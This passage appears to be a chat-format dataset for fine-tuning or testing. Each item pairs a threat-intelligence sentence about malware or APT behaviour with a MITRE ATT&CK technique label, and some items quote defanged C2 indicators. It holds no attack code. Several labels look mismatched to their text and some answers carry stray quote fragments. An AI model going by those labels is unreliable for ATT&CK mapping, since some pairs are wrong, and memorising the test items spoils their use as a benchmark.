- },
- {
- "role": "user",
- "content": "APT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping', 'T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GravityRAT steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Felismus collects the victim LAN IP address and sends it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium can use HTTP/S in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used malware that can collect the victim’s OS version and machine name."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sakula also leverages single-byte XOR encoding to obfuscate various strings and files embedded in the resource section, which are subsequently used for User Account Control (UAC) bypass on both 32 and 64-bit systems. Analysis . CTU researchers performed detailed analysis on 346 Sakula samples, including the installer and all dropped files used by the malware to run. Source: Dell SecureWorks) . Installation . In most of the samples collected by the CTU research team, Sakula maintains persistence by setting the registry Run key (SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\) in either the HKLM or HKCU hive. In the samples compiled in 2014, the adversary switched to adding the Run key by invoking cmd.exe: The registry value and filename vary by sample. Three of the analyzed samples placed files in %APPDATA%, while the remaining Sakula samples placed files in a directory under %ALLUSERSPROFILE%. A small number of samples did not use an additional subdirectory. The msi.dll file is configured to read and XOR-decode setup.msi, also located in the same directory, and run it in memory. Based on whether the compromised system is 32-bit or 64-bit, the appropriate file is written and run using cmd.exe calling rundll32 on the DLL with the PlayWin32 or PlayWin64 export. Center509671.dat). In a small group of Sakula samples from 2013, the install process also modified the hosts file to point some of the victim's subdomains to various IP addresses within the victim's own organization. The malware also registered a file as a command component within the registry. In the Sakula samples where the install process performed cleanup, the malware invoked cmd.exe"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke has compiled malware, delivered to victims as .c files, with the GNU Compiler Collection (GCC)."
- },
- {
- "role": "assistant",
- "content": "T1027.004 - Obfuscated Files or Information: Compile After Delivery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has disabled \"iptables\"."
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FinFisher uses token manipulation with NtFilterToken as part of UAC bypass."
- },
- {
- "role": "assistant",
- "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As with campaigns attributed to BlackEnergy group the attackers used spearphishing emails with Microsoft Excel documents attached that contain malicious macros as an initial infection vector. This time malicious documents don’t have any content with social engineering directing potential victims to click an Enable Content button"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SHUTTERSPEED can download and execute an arbitary executable."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Persistence Mechanism Figure 3 shows that for persistence, the document creates two scheduled tasks and creates one auto-start registry entry pointing to the LNK file"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The recipient clicked the link and proceeded to download and open a malicious HTML executable file, which in turn loaded content from a C&C server via an embedded iframe"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "15 Database dump Decoded, it reveals a detailed log of each affected machine"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GeminiDuke collects information on running processes and environment variables from the victim."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TYPEFRAME can install encrypted configuration data under the Registry key \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\laxhost.dll\" and \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs\"."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Azorult uses an XOR key to decrypt content and uses Base64 to decode the C2 address."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 created accounts on victims, including administrator accounts, some of which appeared to be tailored to each individual staging target."
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In one sample we analyzed, the zip file contains a VBS file named NUM_56960.vbs. The size of the file is around 30MB. The large file size helps it evade detection, as file scanners usually skip scanning huge files for performance reasons. This VBS file then downloads the malicious executable file PaintHelper.exe"
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TSCookie has the ability to list processes on the infected host."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can encrypt and pack malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses cmd.exe to run commands for enumerating the host."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The function of this tool is to set up a TCP listener on a localhost, receive encoded data via requests from the SodomNormal localhost module, and to forward this data to the command and control IP via HTTP. The GUP Proxy Tool has a hardcoded configuration which is included as both strings and integers"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Keydnap prompts the users for credentials."
- },
- {
- "role": "assistant",
- "content": "T1056.002 - Input Capture: GUI Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InnaputRAT gathers volume drive information and system information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MCMD can use HTTPS in communication with C2 web servers."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "leverages valid accounts after gaining credentials for use within the victim domain."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLUELIGHT has collected the computer name and OS version from victim machines."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has used SSH to connect back to victim machines. TeamTNT has also used SSH to transfer tools and payloads onto victim hosts and execute them."
- },
- {
- "role": "assistant",
- "content": "T1021.004 - Remote Services: SSH"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has used VMProtect to pack and protect files."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volgmer checks the system for certain Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We were able to collect over fifty samples of the tools used by the Magic Hound campaign using the AutoFocus threat intelligence tool. The earliest malware sample we were able to collect had a compile timestamp in May 2016. The samples themselves ranged from IRC bots, an open source Python remote access tool, malicious macros, and others"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Installs UnionCryptoTrader in folder /Applications/UnionCryptoTrader.app/Contents/MacOS/ - Installs .unioncryptoupdater in folder /Applications/UnionCryptoTrader.app/Contents/Resources/ Note: the leading “.” makes it unlisted in the Finder app or default Terminal directory listing - Note: the leading “.” makes it unlisted in the Finder app or default Terminal directory listing - Executes a postinstall script Moves .vip.unioncrypto.plist to folder LaunchDaemons Changes the file permissions on the plist to Root Runs unioncryptoupdater Moves .unioncryptoupdater to folder /Library/UnionCrypto/unioncryptoupdater Makes .unioncryptoupdater executable - Moves .vip.unioncrypto.plist to folder LaunchDaemons - Changes the file permissions on the plist to Root - Runs unioncryptoupdater - Moves .unioncryptoupdater to folder /Library/UnionCrypto/unioncryptoupdater - Makes .unioncryptoupdater executable"
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The VBScript in turn runs rundll32.exe, activating the Cobalt Strike DLL (step #5) using a clean parent/child process tree completely disconnected from the SolarWinds process. Finally, the VBScript removes the previously created IFEO value to clean up any traces of execution (step #6) and also deletes the following registry keys related to HTTP proxy"
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host', 'T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ccf32 has created a hidden directory on targeted systems, naming it after the current local time (year, month, and day)."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PipeMon is a modular backdoor where each module is a single DLL exporting a function called IntelLoader and is loaded using a reflective loading technique. Each module exhibits different functionalities that are shown in Table 2"
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FruitFly executes and stores obfuscated Perl scripts."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT33 has used HTTP over TCP ports 808 and 880 for command and control."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Felismus can download files from remote servers."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. TermsHost.exe\" is a PE32 Monero miner. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"Windows processes to bypass firewalls. The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample also creates the UPX-packed file \"dDNLQrsBUE.url\" in the Windows Start Menu Folder. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This dynamic link library appears to be a legitimate version of libcurl.dll except for a single exported function, which is referred to as ordinal #52 and curl_share_init in the analyzed sample. This function has been modified by threat actors to extract a resource contained within libcurl.dll, decrypt malicious data included in that resource, and load the resulting DLL to execute a malicious function. When this function is executed, the SodomNormal communications module begins running within Libcurl.dll"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Systeminfo can be used to gather information about the operating system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can establish persistence by adding a Scheduled Task named \"Microsoft Boost Kernel Optimization\"."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windows Defender ATP displays these activities as process trees in a machine timeline for the infected computer. Analysts can easily extract detailed information from these trees, such as the implant DLL dropped by the installer, the command used to call rundll32.exe and load the DLL, and the registry modifications that set the DLL as a service"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Proton kills security tools like Wireshark that are running."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Epic uses the \"tasklist /v\" command to obtain a list of processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ESET researchers have dissected some of the latest additions to the malicious toolkit of the Advanced Persistent Threat (APT) group known as OceanLotus, also dubbed APT32 and APT-C-00"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Explosive has collected the MAC address from the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NanHaiShu collects the username from the victim."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lokibot is delivered via a malicious XLS attachment contained within a spearhpishing email."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Prior to executing fully, Karagany uses a robust anti-VM detection function that can detect most commonly used virtualization platforms such as VMWare, VirtualBox, VPC, and generic virtualization techniques. Only the VMWare and VirtualBox checks retained, mainly based on loaded drivers and file paths. This change dramatically reduced the file size of the malware"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson contains a command to collect the victim MAC address and LAN IP."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ADVSTORESHELL collects, compresses, encrypts, and exfiltrates data to the C2 server every 10 minutes."
- },
- {
- "role": "assistant",
- "content": "T1029 - Scheduled Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER uses the command-line interface."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8 has used malicious e-mail attachments to lure victims into executing malware."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We found a Coinminer bundled with the legitimate installer of video conferencing app Zoom, luring users who want to install the software but end up unwittingly downloading a malicious file. The compromised files are not from Zoom’s official download center, and are assumed to come from fraudulent websites. We have been working with Zoom to ensure that they are able to communicate this to their users appropriately."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware', 'T1554 - Compromise Host Software Binary', 'T1195.002 - Compromise Software Supply Chain', 'T1574.005 - Executable Installer File Permissions Weakness"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "sends emails to victims with a malicious executable disguised as a document or spreadsheet displaying a fake icon."
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After setting up persistent access, the payload checks to see if a value exists within a registry key in the HKCU hive whose name is the same as the scheduled task (ex. This registry key is empty upon the first execution of the payload. This exception invokes the exception handler containing the HTTP communication code, allowing it to run. If either attempt is successful, the C2 server will respond with the session ID and a pre-shared key in cleartext, which it will save to the previously mentioned registry key. The C2 server will provide the pre-shared key within the response data and will provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID parameter of the cookie. If both attempts fail and the payload is unable to obtain a session ID and pre-shared key via HTTP or HTTPS, it will try to use DNS tunneling. To obtain the session ID and pre-shared key, the payload will issue a query to resolve the following domain: mail"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has injected a DLL backdoor into dllhost.exe and svchost.exe."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gh0st RAT has encrypted TCP communications to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can scan the network for open ports and vulnerable instances of RDP and SMB protocols."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PipeMon can attempt to gain administrative privileges using token impersonation."
- },
- {
- "role": "assistant",
- "content": "T1134.002 - Create Process with Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRatReporter encrypted gathered information with a combination of shifting and XOR using a static key."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The companies believe that the actors acquired legitimate credentials prior to the cyber-attack to facilitate remote access"
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts', 'T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
